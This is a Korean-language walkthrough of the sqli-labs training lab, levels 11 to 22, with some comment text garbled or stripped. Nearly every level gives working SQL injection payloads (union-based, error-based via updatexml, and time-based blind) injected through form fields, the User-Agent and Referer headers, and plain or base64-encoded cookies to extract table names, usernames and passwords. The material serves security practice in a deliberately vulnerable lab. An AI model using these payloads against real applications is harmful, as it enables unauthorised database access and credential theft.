sqli-labs 통관 노트(less11-less22)
51687 단어 sql 주입
less-11
제출 계정과 비밀번호는 모두 123입니다. 실행된 sql문장은 다음과 같습니다.만능 비밀번호로 돌아갈 수 있다.여기 주석은 사용할 수 없습니다 – +
payload:(post 방식으로 제출)
uname=admin' order by 2#&passwd=123&submit=Submit
//
uname=admin' order by 3#&passwd=123&submit=Submit
// , 2
uname=-admin' union select 1,2#&passwd=123&submit=Submit
//1 2 ,admin , -admin
// :
uname=-admin' union select 1,database()#&passwd=123&submit=Submit
// :
uname=-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=123&submit=Submit
// :
uname=-admin' union select 1, group_concat(column_name) from information_schema.columns where table_name='users' #&passwd=123&submit=Submit
:
uname=-admin' union select 1,group_concat(username) from users #&passwd=&submit=Submit
uname=-admin' union select 1,group_concat(password) from users #&passwd=&submit=Submit
less-12
less-11과 기본적으로 같지만 닫는 방식이 (")payload:
// :
uname=-admin") union select 1,database()#&passwd=123&submit=Submit
// :
uname=-admin") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=123&submit=Submit
// :
uname=-admin") union select 1, group_concat(column_name) from information_schema.columns where table_name='users' #&passwd=123&submit=Submit
// :
uname=-admin") union select 1,group_concat(username) from users #&passwd=&submit=Submit
uname=-admin") union select 1,group_concat(password) from users #&passwd=&submit=Submit
less-13
닫기 모드('''), 반향 정보 없음, 오류 메모 사용
payload:
:uname=admin') and updatexml(1,concat(0x7e,database(),0x7e),1)#&passwd=&submit=Submit
:uname=admin') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=&submit=Submit
:
uname=admin') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&passwd=&submit=Submit
:
uname=admin') and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)#&passwd=&submit=Submit
uname=admin') and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)#&passwd=&submit=Submit
less-14
less-13과 기본적으로 같지만 닫는 방식은''payload:
// :
uname=admin" and updatexml(1,concat(0x7e,database(),0x7e),1)#&passwd=&submit=Submit
// :
uname=admin" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=&submit=Submit
// :
uname=admin"and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&passwd=&submit=Submit
// :
uname=admin" and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)#&passwd=&submit=Submit
uname=admin" and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)#&passwd=&submit=Submit
less-15
닫는 방식은''이고 오류를 보고하지 않으며 사용 시간에 대한 맹주:if(length(database())=8,1,sleep(3))는 길이가 정확할 때 직접 표시하고 길이 오류가 있을 때 3초 지연된다는 뜻이다.if(length(database())=8,sleep(3),1)는 길이가 정확할 때 3초 지연되고 길이가 틀릴 때 바로 표시된다는 뜻이다.
payload:
:
uname=admin' and if(length(database())=8,sleep(3),1)#&passwd=&submit=Submit
:
uname=admin' and if(substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit
:
uname=admin' and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))#&passwd=11&submit=Submit
:
uname=admin' and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))#&passwd=11&submit=Submit
:
uname=admin' and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))#&passwd=11&submit=Submit
less-16
less-15와 기본적으로 같고 닫는 방식은 (")
payload:
// :
uname=admin")and if(length(database())=8,sleep(3),1)#&passwd=&submit=Submit
// , 8
// :
uname=admin") and if(substr(database(),1,1)='s',sleep(3),1)#&passwd=&submit=Submit
// :
uname=admin")and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))#&passwd=11&submit=Submit
// :
uname=admin")and If(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))#&passwd=11&submit=Submit
// :
uname=admin") and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))#&passwd=11&submit=Submit
less-17
여기에 구덩이가 있다. 데이터베이스는 먼저 uname에 대해 조회 작업을 하고 사용자가 있어야 수정을 허용한다. 즉, uname에 sql 주입이 존재하지 않고passwd에 주입이 존재한다.passwd의 닫기는 '
payload:
// :
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,database(),0x7e),1)#&submit=Submit
// :
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&submit=Submit
// :
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)#&submit=Submit
// :
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(login) from users),0x7e),1)#&submit=Submit
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1)#&submit=Submit
//* :You can't specify target table 'users' for update in FROM clause*//
uname=admin&passwd=1' and updatexml(1,concat(0x7e,(select group_concat(email_id) from emails),0x7e),1)#&submit=Submit
// emails , , 。
less-18
HTTP 헤더의 주입:user-agent 다음에 '오타' 를 넣으면 여기가 주입점임을 설명합니다.원본 코드를 본 후 코드에서 uname과passwd에 checkinput () 함수의 처리로 uname과passwd를 입력하면 주입할 수 없지만 코드에서 보았습니다
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`,
`username`) VALUES ('$uagent', '$IP', $uname)"; mysql_query($insert);
user-agent와 IP를 데이터베이스에 삽입하면 이걸로 주입할 수 있지 않을까요?우선 여기에 정확한 계정과 비밀번호를 입력해야 계정 비밀번호 판단을 돌려야 uagent 처리 부분에 들어갈 수 있습니다}
payload:
// :
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',1, updatexml(1,concat(0x7e,database(),0x7e),1))#
// :
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
// :
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#
// :
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',updatexml(1,concat(0x7e,(select group_concat(password) from users ),0x7e),1))#
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:12.0) Gecko/20100101 Firefox/12.1',updatexml(1,concat(0x7e,(select group_concat(login) from users ),0x7e),1))#
less-19
less-18과 차이가 많지 않다
"Referer 뒤에""를 입력하면 오류가 발생합니다."
payload:
// :
Referer: http://127.0.0.1/sqli/less-19/',1, updatexml(1,concat(0x7e,database(),0x7e),1))#
// :
Referer: http://127.0.0.1/sqli/less-19/',1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1))#
// :
Referer: http://127.0.0.1/sqli/less-19/',1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#
// :
Referer: http://127.0.0.1/sqli/less-19/',updatexml(1,concat(0x7e,(select group_concat(password) from users ),0x7e),1))#
less-20
쿠키에'보오'를 붙이면 쿠키가 주입점이고 반향이 있다는 것을 의미한다.
payload:
Cookie: uname=admin' order by 3#; security_level=0
//
Cookie: uname=admin' order by 4#; security_level=0
// , 3
Cookie: uname=-admin' union select 1,2,3#; security_level=0
//1、2、3
// :
Cookie: uname=-admin' union select 1,2,database()#; security_level=0
// :
Cookie:uname=-admin' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')#; security_level=0
// :
Cookie:uname=-admin' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')#; security_level=0
// :
Cookie:uname=-admin' union select 1,2,(select group_concat(password) from users)#; security_level=0
less-21
less-20과 기본적으로 같고 닫는 방식은 (''') 쿠키 값이base64에서 처리되었을 뿐이며 오류 주입을 사용해야 합니다.
문자열의 길이가 4의 정수 배인 합법적인 Base64문자열의 기호 수치는 A-Z, a-z, 0-9, +,/, = 총 65자 중 하나이며 = 이 나타나면 반드시 마지막에 나타나야 합니다.
payload:
// :
Cookie: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsZGF0YWJhc2UoKSwweDdlKSwxKSM=; security_level=0
// :
Cookie:uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknKSwweDdlKSwxKSM=; security_level=0
// :
Cookie:uname=YWRtaW4nKWFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSd1c2VycycpLDB4N2UpLDEpIw==; security_level=0
// :
Cookie: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUpIGZyb20gdXNlcnMpLDB4N2UpLDEpIw==; security_level=0
Cookie: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gdXNlcnMpLDB4N2UpLDEpIw==; security_level=0
// less-13,base64 burp 。
less-22
less-21과 기본적으로 같고 닫는 방식은 ""이다
payload:
// :
Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpLDEpIw==; security_level=0
// :
Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScpLDB4N2UpLDEpIw==; security_level=0
// :
Cookie: uname=YWRtaW4iYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX25hbWU9J3VzZXJzJyksMHg3ZSksMSkj; security_level=0
// :
Cookie: uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSkgZnJvbSB1c2VycyksMHg3ZSksMSkj; security_level=0
uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSB1c2VycyksMHg3ZSksMSkj; security_level=0
// less-14,base64 burp 。
좋은 웹페이지 즐겨찾기
